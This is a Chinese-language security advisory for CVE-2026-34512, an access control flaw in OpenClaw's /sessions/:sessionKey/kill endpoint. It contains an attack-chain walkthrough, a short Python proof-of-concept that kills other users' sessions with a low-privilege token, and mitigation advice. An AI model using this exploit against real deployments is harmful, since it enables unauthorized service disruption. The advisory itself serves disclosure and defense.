CVE-2026-34512 CVSS 8.1 高危

CVE-2026-34512 OpenClaw访问控制缺陷漏洞

披露日期: 2026-04-09

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-34512

漏洞类型

访问控制失效

CVSS评分

8.1 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw在2026.3.25之前的版本中存在不恰当的访问控制漏洞。该漏洞位于HTTP /sessions/:sessionKey/kill路由中，允许任何持有Bearer Token认证的用户在未经适当权限范围验证的情况下调用管理员级别的会话终止功能。攻击者可利用此漏洞，通过发送经过身份验证的请求，绕过所有权和操作员范围限制，强制终止任意子代理的会话，导致系统中断。

技术细节

该漏洞源于OpenClaw框架在处理会话管理时的授权逻辑缺陷。具体而言，/sessions/:sessionKey/kill端点旨在允许管理员终止特定子代理的运行会话。然而，该接口的实现仅依赖于Bearer Token的存在性以确认用户身份，却完全忽略了对用户权限范围和操作所有权的验证。这使得任何经过身份验证的低权限用户（如普通操作员）都可以通过构造特定的HTTP请求，直接调用后台敏感的killSubagentRunAdmin函数。攻击者只需猜测或枚举sessionKey，即可将针对任意会话的终止请求发送至服务器。由于该操作绕过了正常的RBAC模型，导致系统完整性（I:H）和可用性（A:H）受到严重影响，攻击者可利用此漏洞恶意中断关键业务流程，造成严重的拒绝服务或数据不一致状态。

攻击链分析

STEP 1

1. 信息收集

攻击者识别目标系统运行的是OpenClaw，并且版本低于2026.3.25。同时确认目标系统开放了/sessions相关的HTTP接口。

STEP 2

2. 获取凭证

攻击者注册或获取一个普通低权限用户账号，登录系统获取有效的Bearer Token。由于漏洞需要低权限认证（PR:L），这一步是必须的。

STEP 3

3. 构造攻击请求

攻击者使用获取的Token，构造一个发送至/sessions/{target_session_key}/kill的HTTP POST请求。请求中包含想要终止的特权会话ID。

STEP 4

4. 执行越权操作

服务器接收到请求后，仅验证Token有效性，未检查用户权限，直接调用killSubagentRunAdmin函数终止目标会话，导致服务中断。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL
target_url = "http://target-openclaw-instance/sessions/{session_key}/kill"

# Attacker's low-privileged bearer token
# The vulnerability requires authentication (PR:L), so a valid token is needed.
bearer_token = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..."

# The session key of the subagent run to kill
target_session_key = "example-session-key-12345"

headers = {
    "Authorization": f"Bearer {bearer_token}",
    "Content-Type": "application/json"
}

# Send the request to exploit the improper access control
# The system fails to check if the token has admin scope or ownership
response = requests.post(target_url.format(session_key=target_session_key), headers=headers)

if response.status_code == 200:
    print(f"[+] Exploit successful: Session {target_session_key} has been terminated.")
else:
    print(f"[-] Exploit failed: Server returned {response.status_code}")
    print(response.text)

影响范围

OpenClaw < 2026.3.25

防御指南

临时缓解措施

建议立即升级至修复版本。若暂时无法升级，应通过网络访问控制列表（ACL）限制对/sessions/:sessionKey/kill端点的访问，仅允许受信任的管理员IP地址调用。同时，加强对低权限用户Token的监控，一旦发现大量终止会话的异常请求，应立即撤销相关凭证并进行调查。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表